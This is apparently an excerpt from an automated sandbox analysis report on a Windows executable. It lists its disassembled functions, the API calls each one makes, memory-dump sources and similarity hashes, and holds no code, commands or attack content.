                                                                            Function 00322957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __flush.LIBCMT ref: 00322A0B
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __flush__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 4101623367-0
                                                                            • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                            • Instruction ID: 69d57cfa2a9ecedb405d3b228a376cf4bef747a8f0c9759421d6181702a8438d
                                                                            • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                            • Instruction Fuzzy Hash: A041C470700726BFDF2A8E69EC815AF7BB6AF45360B25852DE855CB640EB70DD908B40
                                                                            Function 0031ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 4bc1c9eb0c76bdf03471dc135c2e27308829e79a561bee0ae6d7a6a2aab4ea5d
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 9731E770A00105DFC71ADF58E4909A9FBB6FF4D340B6586A9E809CB656DB32EDC1CB80
                                                                            Function 00379A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 590d3686c6ad22e0c3f23c195414343803ff6ae08135b9e12fc1d18f8069a47b
                                                                            • Instruction ID: ab7446f48204575582007fbba66fde231a834d5943d6e4aaf8dce476ecd3efae
                                                                            • Opcode Fuzzy Hash: 590d3686c6ad22e0c3f23c195414343803ff6ae08135b9e12fc1d18f8069a47b
                                                                            • Instruction Fuzzy Hash: B1417E705086418FDB2ACF14C084B5ABBF1BF89304F19899CE99A4B762C376F885CF42
                                                                            Function 0032ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3074181302-0
                                                                            • Opcode ID: 2ba0f7e3d66fce4c8a422a539a1e6d32f7cc7f1fb7c936ffa802b5b34704fa91
                                                                            • Instruction ID: 34f165f5120c19519ff7cb7fdac5f61b146ccda19c97e0dea6204a41424ea706
                                                                            • Opcode Fuzzy Hash: 2ba0f7e3d66fce4c8a422a539a1e6d32f7cc7f1fb7c936ffa802b5b34704fa91
                                                                            • Instruction Fuzzy Hash: 3B218CB28146708FD713BFA8FC477583AA5AF42336F2A0640E4305F1E2DBB49C008BA5
                                                                            Function 003041A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00304214: FreeLibrary.KERNEL32(00000000,?), ref: 00304247
                                                                            • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003039FE,?,00000001), ref: 003041DB
                                                                              • Part of subcall function 00304291: FreeLibrary.KERNEL32(00000000), ref: 003042C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load
                                                                            • String ID:
                                                                            • API String ID: 2391024519-0
                                                                            • Opcode ID: 3220e553cf66af1cbc982fd358bb2d061923d87bc77716ac0b3839c2bc793496
                                                                            • Instruction ID: d0b17bed008f9e78f73065cf43405618dabcfe81ffbfdd0815a54f64c96030cf
                                                                            • Opcode Fuzzy Hash: 3220e553cf66af1cbc982fd358bb2d061923d87bc77716ac0b3839c2bc793496
                                                                            • Instruction Fuzzy Hash: BB11C1B1701306ABCB12BB64DC26F9E77AD9F40700F108829F696AE0C2DB74DB149B60
                                                                            Function 00379B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 14461c417fe19c37f7a94e712900a7f3cdbc70e2f01b6c1ff8ca905f70a37ea9
                                                                            • Instruction ID: 0d44a027a81c746dd01cf222130dbcc96dd606c276a13403e73ba74bc1df1b5c
                                                                            • Opcode Fuzzy Hash: 14461c417fe19c37f7a94e712900a7f3cdbc70e2f01b6c1ff8ca905f70a37ea9
                                                                            • Instruction Fuzzy Hash: 6E216970508701CFDB2ADF64C444B5ABBE1BF89304F15896CF59A4B662C771E885CF52
                                                                            Function 0032AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___lock_fhandle.LIBCMT ref: 0032AFC0
                                                                              • Part of subcall function 00327BDA: __getptd_noexit.LIBCMT ref: 00327BDA
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$___lock_fhandle
                                                                            • String ID:
                                                                            • API String ID: 1144279405-0
                                                                            • Opcode ID: f2290af03fd204319d53135fab66a9b93b22fdfe93bc8363d154aaf6621e2ce9
                                                                            • Instruction ID: 094e78df11762d147444803b75567966b65e3446639034add3ea7e862b7fec92
                                                                            • Opcode Fuzzy Hash: f2290af03fd204319d53135fab66a9b93b22fdfe93bc8363d154aaf6621e2ce9
                                                                            • Instruction Fuzzy Hash: D01191728156709FD7137FA4F94275DBB60AF42331F168640E4745F1E2D7B89D008BA1
                                                                            Function 003039DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                            • Instruction ID: db7b3857b405f9d60d916561ea40dd94bfdd2d5d189084b4d5818265e14c104e
                                                                            • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                            • Instruction Fuzzy Hash: F3013671501109EECF06EF64C8918FEBB78AF20344F108065B5559B1D5EA309B49DF60
                                                                            Function 00322AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00322AED
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2597487223-0
                                                                            • Opcode ID: 376b21b7818301a32a4f0c45003420713ed0fc575a34da18741ec4f2e68bf215
                                                                            • Instruction ID: 7459747bb4a030b202f646bd768f0e5621be1451f68b455aa9ccae03e705a61e
                                                                            • Opcode Fuzzy Hash: 376b21b7818301a32a4f0c45003420713ed0fc575a34da18741ec4f2e68bf215
                                                                            • Instruction Fuzzy Hash: CEF0CD31900225BADF23AF79AC033DF3AA5BF00320F168425F4149E192CB788A62DB81
                                                                            Function 00304252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,003039FE,?,00000001), ref: 00304286
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 059425e56187bf92a724d89d8edc00f7c24dd5d806d7ffb6078f46ae7545bf74
                                                                            • Instruction ID: ac3972403a4e9245d761b2cc0c5b7402c24c1903be302e855fcff7ba154e57c0
                                                                            • Opcode Fuzzy Hash: 059425e56187bf92a724d89d8edc00f7c24dd5d806d7ffb6078f46ae7545bf74
                                                                            • Instruction Fuzzy Hash: E9F030B1606711CFCB369F64D4A4816B7F8BF043253258E7EF2D682550C7319A40DF50
                                                                            Function 003040A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003040C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID:
                                                                            • API String ID: 82841172-0
                                                                            • Opcode ID: 8bfb6c86dbd24ad30f781d6705b73329f62b1235926586e811f87e5bde96ae6c
                                                                            • Instruction ID: 24b3cecbba610cc0da4a0ad1981f10d0684ee92ce8038f0b2c8a5d6bf0e1d105
                                                                            • Opcode Fuzzy Hash: 8bfb6c86dbd24ad30f781d6705b73329f62b1235926586e811f87e5bde96ae6c
                                                                            • Instruction Fuzzy Hash: 66E0CD766002245BC712A654DC46FEA77ADDF8C7A0F0501B5F905DB244D96499818790
                                                                            Function 0034BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                            • Instruction ID: b7b5fe81a8c924a71de395dd58a830d54c017f6bf0fd8b4ff0eed177e54660b6
                                                                            • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                            • Instruction Fuzzy Hash: 50E092B1504B009BD7398E24D800BE3B3E0EB06309F00085CF2DA87241EBA2B8418659
                                                                            Function 00D46B40 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 00D46B51
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 1dbefdbf9fb5851a9c95cb7153f185ed4a44842281cfaae10248789e81ce6158
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 83E0BF7494010D9FDB00EFA8D54969E7BB4EF04301F100161FD02D2280D63199508A62

                                                                            Non-executed Functions

                                                                            Function 0036F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0036F87D
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0036F8DC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0036F919
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0036F940
                                                                            • SendMessageW.USER32 ref: 0036F966
                                                                            • _wcsncpy.LIBCMT ref: 0036F9D2
                                                                            • GetKeyState.USER32(00000011), ref: 0036F9F3
                                                                            • GetKeyState.USER32(00000009), ref: 0036FA00
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0036FA16
                                                                            • GetKeyState.USER32(00000010), ref: 0036FA20
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0036FA4F
                                                                            • SendMessageW.USER32 ref: 0036FA72
                                                                            • SendMessageW.USER32(?,00001030,?,0036E059), ref: 0036FB6F
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0036FB85
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0036FB96
                                                                            • SetCapture.USER32(?), ref: 0036FB9F
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FC03
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0036FC0F
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0036FC29
                                                                            • ReleaseCapture.USER32 ref: 0036FC34
                                                                            • GetCursorPos.USER32(?), ref: 0036FC69
                                                                            • ScreenToClient.USER32(?,?), ref: 0036FC76
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0036FCD8
                                                                            • SendMessageW.USER32 ref: 0036FD02
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0036FD41
                                                                            • SendMessageW.USER32 ref: 0036FD6C
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0036FD84
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0036FD8F
                                                                            • GetCursorPos.USER32(?), ref: 0036FDB0
                                                                            • ScreenToClient.USER32(?,?), ref: 0036FDBD
                                                                            • GetParent.USER32(?), ref: 0036FDD9
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0036FE3F
                                                                            • SendMessageW.USER32 ref: 0036FE6F
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FEC5
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0036FEF1
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0036FF19
                                                                            • SendMessageW.USER32 ref: 0036FF3C
                                                                            • ClientToScreen.USER32(?,?), ref: 0036FF86
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0036FFB6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0037004B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 2516578528-4164748364
                                                                            • Opcode ID: 5812abd1c44a35519b8e7301fba5f520e9dba091b6d39ab5cb864f3a2d70ee7d
                                                                            • Instruction ID: 0471f48478731ae0d78a6478fa10ed614ab8674cbd053825761d518a96e2ab2b
                                                                            • Opcode Fuzzy Hash: 5812abd1c44a35519b8e7301fba5f520e9dba091b6d39ab5cb864f3a2d70ee7d
                                                                            • Instruction Fuzzy Hash: 7032EC74604344EFDB22CF64D884FAABBA8FF49354F0486A9FA95872A5D731EC10CB51
                                                                            Function 0036AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0036B1CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 3850602802-328681919
                                                                            • Opcode ID: ac9df29060358bfdf559885d52a08f2265182055c068c36bccc2147431ca096f
                                                                            • Instruction ID: c542db83bf5e9085eab173579c50d1e91c5d3193f8f67647d2c2837d16a384ad
                                                                            • Opcode Fuzzy Hash: ac9df29060358bfdf559885d52a08f2265182055c068c36bccc2147431ca096f
                                                                            • Instruction Fuzzy Hash: FE12DE71500208ABEB269F64CC59FAEBBB8FF46710F108259F91AEB2D5DB748941CF11
                                                                            Function 0031EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 0031EB4A
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00373AEA
                                                                            • IsIconic.USER32(000000FF), ref: 00373AF3
                                                                            • ShowWindow.USER32(000000FF,00000009), ref: 00373B00
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373B0A
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00373B20
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00373B27
                                                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00373B33
                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00373B44
                                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00373B4C
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00373B54
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373B57
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B6C
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B77
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B81
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B86
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B8F
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373B94
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00373B9E
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00373BA3
                                                                            • SetForegroundWindow.USER32(000000FF), ref: 00373BA6
                                                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00373BCD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
